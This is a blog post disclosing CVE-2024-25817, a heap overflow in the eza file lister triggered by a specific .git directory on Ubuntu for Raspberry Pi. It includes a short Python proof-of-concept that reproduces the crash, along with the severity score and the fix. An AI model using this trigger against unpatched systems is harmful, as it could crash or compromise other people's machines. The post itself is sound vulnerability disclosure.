354 words
2 minutes
CVE-2024-25817
2024-02-07
2024-06-08
CVE
CVE

Summary#

In eza 1 (before v0.18.11), there exists a heap overflow vulnerability, first seen when using Ubuntu for Raspberry Pi series system, on ubuntu-raspi kernel, relating to the .git directory.

Details#

The vulnerability seems to be triggered by the .git directory in some projects. This issue may be related to specific files, and the directory structure also plays a role in triggering the vulnerability. Files/folders that may be involved in triggering the vulnerability include .git/HEAD, .git/refs, and .git/objects.

PoC - If you have Raspberry Pi 4B bare metal machine#

If you don’t have Raspberry Pi bare metal, you can try emulate a ubuntu for raspberry system in virtual machine.

You just need install any one of Ubuntu for Raspberry Pi series system in your bare metal machine.

Tested platform info#

Configuration in Raspberry Pi 4B bare metal machine:

Terminal window
eza version: v0.18.10 [+git]


Linux lux 5.15.0-1049-raspi #52-Ubuntu SMP PREEMPT Thu Mar 14 08:39:42 UTC 2024 aarch64 aarch64 aarch64 GNU/Linux


Distributor ID: Ubuntu
Description: Ubuntu 22.04.4 LTS
Release: 22.04
Codename: jammy
WARNING

So far I have only tested the Ubuntu 22.04.4 LTS Server and confirmed that this vulnerability exists. I haven’t test other System/Raspberry Pi yet.

Steps#

Install eza (<=v0.18.10) in Raspberry Pi. Process can refer to the official wiki.

#!/usr/bin/env python3


import os
import shutil
import subprocess


# Step 1: Clone the repository
repo_url = "https://github.com/umami-software/umami.git"
subprocess.run(["git", "clone", repo_url])


# Step 2: Checkout to the specific commit contain the special '.git' directory that can trigger the vulnerability
repo_dir = "umami"
commit_hash = "a38baa5"
os.chdir(repo_dir)
subprocess.run(["git", "checkout", commit_hash])


# Step 3: Create a directory for the vulnerability related files
os.chdir("..")
os.mkdir("suspicious")
shutil.move(os.path.join(repo_dir, ".git"), "suspicious/.git")


# Step 4: Remove unrelated files/directories
shutil.rmtree(repo_dir)


# Step 5: Trigger the vulnerability
subprocess.run(["eza", "-l", "--git", "suspicious/.git"])
NOTE

The picture shows my test environment. In actual testing, the vulnerability can be triggered by just using the above script.

Impact#

Arbitrary code execution.

Severity using CVSS#

Severity: High 8.4
Vector string: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses#

  • Heap-based Buffer Overflow (CWE-122)
  • Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119)
  • Missing Release of Memory after Effective Lifetime (CWE-401)
  • Improper Resource Shutdown or Release (CWE-404)
  • Improper Initialization (CWE-665)

GitHub Advisories#

  • GitHub Advisories.2

NIST#

  • National Vulnerability Database.3

Solution#

Update eza to 0.18.11 or higher version.

References#

Footnotes#

  1. eza: A modern, maintained replacement for ls.

  2. GitHub Advisories

  3. CVE-2024-25817

CVE-2024-25817
https://assembly.rip/posts/my-cves/eza-cve-report/
Author
CuB3y0nd
Published at
2024-02-07
© 2025 CuB3y0nd. All Rights Reserved. / RSS / Sitemap